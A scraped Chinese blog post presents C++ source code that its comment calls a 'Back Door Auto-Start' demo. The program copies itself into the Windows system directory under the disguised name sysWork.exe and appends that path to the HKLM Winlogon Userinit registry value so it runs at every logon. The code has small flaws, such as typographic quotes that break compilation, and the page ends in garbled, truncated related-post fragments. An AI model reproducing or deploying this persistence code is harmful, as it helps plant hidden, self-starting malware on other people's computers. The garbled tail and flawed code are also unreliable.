2. 程式人生 > >C/C++實現利用添加註冊表項實現文件自啟動

C/C++實現利用添加註冊表項實現文件自啟動

阿新 發佈:2018-08-24
c++實現 ng- 註冊表操作 comm .cpp mod mps main 文件路徑

簡介

添加註冊表項是實現文件自啟動的經典方法之一,但因為操作註冊表項是一個敏感操作,被報毒可能性較大,但即便如此,這個方法還是值得一學的,因為後期大部分編程都涉及到註冊表操作。


最常使用到的註冊表項有兩項:

  1. "HKEY_CURRENT_USER\Software\Microsoft\WindowsNT\CurrentVersion\Windows"“load”鍵下的鍵值改為自啟動目標文件路徑,但缺點在於只能支持一個程序;
  2. "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon"“Userinit”
    鍵下的值加上自啟動目標文件路徑,但是要註意雖然支持多文件自啟動,但每個文件路徑之間切記要用逗號隔開


C++代碼樣例

//////////////////////////////////////////////////////////////
//
// FileName : RegAutoRunDemo.cpp
// Creator : PeterZ1997
// Date : 2018-5-1 21:34
// Comment : Add registry key(s) to achieve the Back Door Auto-Start
//
//////////////////////////////////////////////////////////////

#include <cstdio>
#include <iostream>
#include <windows.h>
#include <cstdlib>
#include <cstring>

using namespace std;

const unsigned int MAX_COUNT = 255; /// Max String Length

CHAR szRegInfo[MAX_COUNT] = "\0";

/**
 * @brief Compare two String
 * @param str1 String-1
 * @param str2 String-2
 * @return Boollean Value
 */
BOOL compareTwoString(LPCTSTR str1, LPCSTR str2)
{
    CHAR szTempStr01[MAX_COUNT] = "\0";
    CHAR szTempStr02[MAX_COUNT] = "\0";
    if (strlen(str1) < strlen(str2))
    {
        strcpy_s(szTempStr02, sizeof(szTempStr01), str1);
        strcpy_s(szTempStr01, sizeof(szTempStr02), str2);
    }
    else
    {
        strcpy_s(szTempStr01, sizeof(szTempStr01), str1);
        strcpy_s(szTempStr02, sizeof(szTempStr02), str2);
    }
    for (int i = 0; i < strlen(szTempStr01) - strlen(szTempStr02); i++)
    {
        for (int j = 0; j < strlen(szTempStr02); j++)
        {
            if (*(szTempStr01 + j + i) != *(szTempStr02 + j))
            {
                break;
            }
            if (*(szTempStr01 + j + i) == *(szTempStr02 + j) && j == strlen(szTempStr02) - 1)
            {
                return true;
            }
        }
    }
    return false;
}

/**
 * @brief Add a string key to Registry
 * @param hRoot root key
 * @param szSubKey sub key after the root key
 * @param szValueName key name
 * @param szData key Data
 * @return Boollean Value
 */
BOOL setStringToReg(HKEY hRoot, LPCTSTR szSubKey, LPCTSTR szValueName, LPCTSTR szData)
{
    HKEY hKey;
    LONG lRes = RegCreateKeyEx(hRoot, szSubKey, 0, NULL, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &hKey, NULL);
    if (lRes != ERROR_SUCCESS)
    {
        RegCloseKey(hKey);
        RegCloseKey(hRoot);
        return false;
    }
    lRes = RegSetValueEx(hKey, szValueName, 0, REG_SZ, (BYTE*)szData, strlen(szData));
    if (lRes != ERROR_SUCCESS)
    {
        RegCloseKey(hKey);
        RegCloseKey(hRoot);
        return false;
    }
    RegCloseKey(hKey);
    RegCloseKey(hRoot);
    return true;
}

/**
 * @brief Get key info
 * @param hRoot root key
 * @param szSubKey sub key after the root key
 * @param szValueName key name
 * @return Boollean Value
 */
BOOL getRegInfo(HKEY hRoot, LPCTSTR szSubKey, LPCTSTR szValueName)
{
    HKEY hKey;
    DWORD dwType = REG_SZ;
    DWORD dwLenData = strlen(szRegInfo);
    LONG lRes = RegCreateKeyEx(hRoot, szSubKey, 0, NULL, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &hKey, NULL);
    if (lRes != ERROR_SUCCESS)
    {
        RegCloseKey(hKey);
        RegCloseKey(hRoot);
        return false;
    }
    RegQueryValueEx(hKey, szValueName, 0, &dwType, NULL, &dwLenData);
    lRes = RegQueryValueEx(hKey, szValueName, 0, &dwType, (LPBYTE)szRegInfo, &dwLenData);
    if (lRes != ERROR_SUCCESS)
    {
        RegCloseKey(hKey);
        RegCloseKey(hRoot);
        return false;
    }
    RegCloseKey(hKey);
    RegCloseKey(hRoot);
    return true;
}

/**
* @brief Main Function
*/
int WINAPI WinMain(_In_ HINSTANCE hInstance, _In_opt_ HINSTANCE hPrevInstance, _In_ LPSTR lpCmdLine, _In_ int nShowCmd)
{
    CHAR szSystemPath[MAX_COUNT] = "\0";
    CHAR szFilePath[MAX_COUNT] = "\0";
    CHAR szRegValue[MAX_COUNT] = "\0";
    CHAR szTotalString[MAX_COUNT] = "\0";
    if (getRegInfo(HKEY_LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon", "Userinit")) strcat_s(szRegValue, sizeof(szRegValue), szRegInfo);
    else return 0;
    for (int i = 1;;)
    {
        if (szRegValue[strlen(szRegValue) - i] == ‘ ‘)
        {
            szRegValue[strlen(szRegValue) - i] = ‘\0‘;
        }
        else
        {
            break;
        }
    }
    if (szRegValue[strlen(szRegValue) - 1] != ‘,‘) strcat_s(szRegValue, sizeof(szRegValue), ",");
    strcat_s(szTotalString, sizeof(szTotalString), szRegValue);
    if (!compareTwoString(szTotalString, "C:\\Windows\\SysWOW64\\sysWork.exe"))
    {
        strcat_s(szTotalString, sizeof(szTotalString), "C:\\Windows\\SysWOW64\\");
        strcat_s(szTotalString, sizeof(szTotalString), "sysWork.exe,");
    }
    GetSystemDirectory(szSystemPath, sizeof(szSystemPath));
    strcat_s(szSystemPath, sizeof(szSystemPath), "\\sysWork.exe");
    if (!compareTwoString(szRegValue, szSystemPath))
    {
        strcat_s(szTotalString, sizeof(szTotalString), szSystemPath);
        strcat_s(szTotalString, sizeof(szTotalString), ",");
    }
    GetModuleFileName(NULL, szFilePath, sizeof(szFilePath));
    if (strcmp(szFilePath, szSystemPath) && strcmp(szFilePath, "C:\\Windows\\SysWOW64\\sysWork.exe"))
    {
        if (!CopyFile(szFilePath, szSystemPath, true)) return 0;
        if (!setStringToReg(HKEY_LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon", "Userinit", szTotalString)) return 0;
    }
    MessageBox(NULL, "HelloWorld", "Tips", MB_OK);
    ExitProcess(0);
    return 0;
}

C/C++實現利用添加註冊表項實現文件自啟動

相關推薦

C/C++實現利用註冊實現啟動

c++實現 ng- 註冊表操作 comm .cpp mod mps main 文件路徑 簡介 添加註冊表項是實現文件自啟動的經典方法之一,但因為操作註冊表項是一個敏感操作,被報毒可能性較大,但即便如此,這個方法還是值得一學的,因為後期大部分編程都涉及到註冊表操作。 最常

C# Winform打包部署時註冊資訊實現開機啟動

      使用VS自帶的打包模組可以很方便的對專案進行打包部署,同時我們也可以在安裝部署時操作登錄檔實現開機啟動軟體。具體實現如下: 建立安裝部署這部分就不用說了,新增安裝部署專案後,滑鼠右鍵安裝專案->檢視->登錄檔, 要使軟體在開機就執行,可以在HKEY_C

python 以及 pywin32註冊

  1、python 添加註冊表資訊: import sys from winreg import * # tweak as necessary version = sys.version[:3] installpath = sys.prefix regpath =

jsp、html通過註冊開啟本地應用

      之前在給客戶做專案的時候,客戶的需求是想通過前段HTML頁面的按鈕直接開啟本地的應用,參考了資料,終於與解決了,話不多說,直接上原始碼。 方法:在客戶端添加註冊表,html通過<a href>跳轉實現開啟本地應用。 一個簡

QSettings配置讀寫-win註冊操作-ini讀寫

幫助 adding 寫入 ase star 平臺 讀數 轉載 qstring 版權聲明:若無來源註明,Techie亮博客文章均為原創。 轉載請以鏈接形式標明本文標題和地址: 本文標題:QSettings配置讀寫-win註冊表操作-ini文件讀寫 本文地址:http

只針對子目錄執行權限,不受影響

目錄 .com 文件 mage dirname chmod image name 執行權 chmod -R a=rwX Dirname 遞歸,只影響子目錄,不影響文件 只針對子目錄添加執行權限,文件不受影響

監控註冊,監控,監控進程

font 註冊表 nbsp 16px str 監控 ont size 監控進程 一、監控註冊表 二、監控文件 三、監控進程 監控註冊表,監控文件,監控進程

pandas中帶有路徑的csv

hand tensor csv learn panda das imp with orf csv文件帶有路徑的話不能直接調用read_csv()函數 import pandas as pd pd.read_csv(F:\hand on machine learni

C# 如何向Excel、刪除單控

控件 單選 ofo void shee [] 材質 添加 free 在Excel中,添加的控件可以和單元格關聯,我們可以操作控件來修改單元格的內容,在下面的文章中,將介紹在Excel中添加幾種不同的表單控件的方法,包括: 添加文本框 單選按鈕 復選框 組合框 使用工具:

C#根據字體名通過註冊獲取該字體路徑(win10)

cat mic 約束 lec 運行 window mac war 控件 方法一: 直接先上源碼: private System.Collections.Generic.SortedDictionary<string, string> ReadF

C# 桌面截屏 鼠標

位圖 創建 npos reg sha window new nbsp ons #region 第一種方法 [DllImport("user32.dll")] static extern bool GetCursorInfo(out CURSO

C#數組 動態元素

where asc str 動態添加 byte[] rip string add ray string[] a = new string[] { "1", "2", "3" }; 給a追加一個 "4" string[] a = new string[] { "1", "2

C#註冊及值為空測試

lin 判斷 class sys foreach name object gis for 1 static void Main(string[] args) 2 { 3 //不能以 \ 開頭,否則返回null

C#/VB.NET 如何、獲取、刪除PDF附件

C# .NET PDF API PDF附件 類庫 VB.NET 概述 附件,指隨同文件發出的有關文件或物品。在PDF文檔中,我們可以添加同類型的或其他類型的文檔作為附件內容,而PDF中附件也可以分為兩種存在形式,一種是附件以普通文件形式存在,另一種是以註釋的形式存在。在下面的示例中介紹了如

C# 如何給Excel超鏈接

能夠 ext offset IT alignment spi 對齊方式 args 位置 簡介 超鏈接能夠快速地將當前文本或圖片鏈接到指定目標地址,在日常辦公中給我們提供了極大的便利。本文將介紹在C#語言中如何通過免費版組件對Excel表格添加超鏈接,示例中將包含以下要點:1

C# 往Datatable中新行的步驟

tab pla 聲明 ble ++ light fineui val clas 以一個實例說明 //錄入年份綁定 [csharp] view plain string str1=str.Remove(0,i); string st

C# 在PDF頁面打印按鈕

步驟 提升 添加引用 hit rec rgb create reat geb 簡述 在文檔中設置按鈕給我們提供了一種快速操作文檔的方式,簡潔省事,應用於程序中能夠有效的提升客戶滿意度。在前一篇文章中講述了如何在PDF文檔中設置頁面的跳轉按鈕,包括跳轉至指定頁,包括首頁、下一

初入 OpenGL ---白屏問題 -- glad.c在查找預編譯頭遇到意外的結尾,是否忘記向源中#include "stdafx.h" ?

setw 檢查 wid event buffers cout stream swap turn 學習地址:https://learnopengl-cn.github.io 學習成果: 前言: 跟著教程走,用VS2017 配置完了OpenGL的運行.

C++ 執行 cmd 命令 刪除 刪除註冊

執行 window pda ech current info 等待 bsp clu #include <Windows.h> WinExec("cmd /C \"del C:\\Windows\\secretWin.ini\"",SW_HIDE)

C# 超鏈接到PDF

for 外部 alt sam can 跳轉 aws dff not 概述 超鏈接可以實現不同元素之間的連接,用戶可以通過點擊被鏈接的元素來激活這些鏈接。具有高效、快捷、準確的特點。本文中,將分享通過C#編程在PDF文檔中插入超鏈接的方法。內容包含以下要點: 插入網頁鏈接